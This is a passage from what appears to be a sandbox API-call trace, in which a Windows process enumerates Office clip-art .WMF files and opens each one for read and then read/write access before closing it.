lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.419] GetFileType (hFile=0x27c) returned 0x1 [0104.419] CloseHandle (hObject=0x27c) returned 1 [0104.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.419] GetFileType (hFile=0x27c) returned 0x1 [0104.420] CloseHandle (hObject=0x27c) returned 1 [0104.420] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f0)) returned 1 [0104.420] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b90, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00775_.WMF", cAlternateFileName="")) returned 1 [0104.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.420] GetFileType (hFile=0x27c) returned 0x1 [0104.420] CloseHandle (hObject=0x27c) returned 1 [0104.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.420] GetFileType (hFile=0x27c) returned 0x1 [0104.420] CloseHandle (hObject=0x27c) returned 1 [0104.420] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b90)) returned 1 [0104.420] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2332, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00779_.WMF", cAlternateFileName="")) returned 1 [0104.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.421] GetFileType (hFile=0x27c) returned 0x1 [0104.421] CloseHandle (hObject=0x27c) returned 1 [0104.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.421] GetFileType (hFile=0x27c) returned 0x1 [0104.421] CloseHandle (hObject=0x27c) returned 1 [0104.421] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2332)) returned 1 [0104.421] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3690, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00799_.WMF", cAlternateFileName="")) returned 1 [0104.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.422] GetFileType (hFile=0x27c) returned 0x1 [0104.422] CloseHandle (hObject=0x27c) returned 1 [0104.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.422] GetFileType (hFile=0x27c) returned 0x1 [0104.422] CloseHandle (hObject=0x27c) returned 1 [0104.422] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3690)) returned 1 [0104.422] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa6d0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00814_.WMF", cAlternateFileName="")) returned 1 [0104.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.423] GetFileType (hFile=0x27c) returned 0x1 [0104.423] CloseHandle (hObject=0x27c) returned 1 [0104.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.423] GetFileType (hFile=0x27c) returned 0x1 [0104.423] CloseHandle (hObject=0x27c) returned 1 [0104.423] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa6d0)) returned 1 [0104.423] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b3c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00965_.WMF", cAlternateFileName="")) returned 1 [0104.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.424] GetFileType (hFile=0x27c) returned 0x1 [0104.424] CloseHandle (hObject=0x27c) returned 1 [0104.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.424] GetFileType (hFile=0x27c) returned 0x1 [0104.424] CloseHandle (hObject=0x27c) returned 1 [0104.424] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b3c)) returned 1 [0104.424] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01074_.WMF", cAlternateFileName="")) returned 1 [0104.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.425] GetFileType (hFile=0x27c) returned 0x1 [0104.425] CloseHandle (hObject=0x27c) returned 1 [0104.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.425] GetFileType (hFile=0x27c) returned 0x1 [0104.425] CloseHandle (hObject=0x27c) returned 1 [0104.425] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121a)) returned 1 [0104.425] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x96c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01084_.WMF", cAlternateFileName="")) returned 1 [0104.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.425] GetFileType (hFile=0x27c) returned 0x1 [0104.425] CloseHandle (hObject=0x27c) returned 1 [0104.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.426] GetFileType (hFile=0x27c) returned 0x1 [0104.426] CloseHandle (hObject=0x27c) returned 1 [0104.426] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x96c)) returned 1 [0104.426] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1378, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01176_.WMF", cAlternateFileName="")) returned 1 [0104.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.426] GetFileType (hFile=0x27c) returned 0x1 [0104.426] CloseHandle (hObject=0x27c) returned 1 [0104.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.426] GetFileType (hFile=0x27c) returned 0x1 [0104.426] CloseHandle (hObject=0x27c) returned 1 [0104.427] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1378)) returned 1 [0104.427] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf7c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01191_.WMF", cAlternateFileName="")) returned 1 [0104.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.427] GetFileType (hFile=0x27c) returned 0x1 [0104.427] CloseHandle (hObject=0x27c) returned 1 [0104.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.427] GetFileType (hFile=0x27c) returned 0x1 [0104.427] CloseHandle (hObject=0x27c) returned 1 [0104.427] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf7c)) returned 1 [0104.427] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x488, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01193_.WMF", cAlternateFileName="")) returned 1 [0104.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.429] GetFileType (hFile=0x27c) returned 0x1 [0104.429] CloseHandle (hObject=0x27c) returned 1 [0104.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.429] 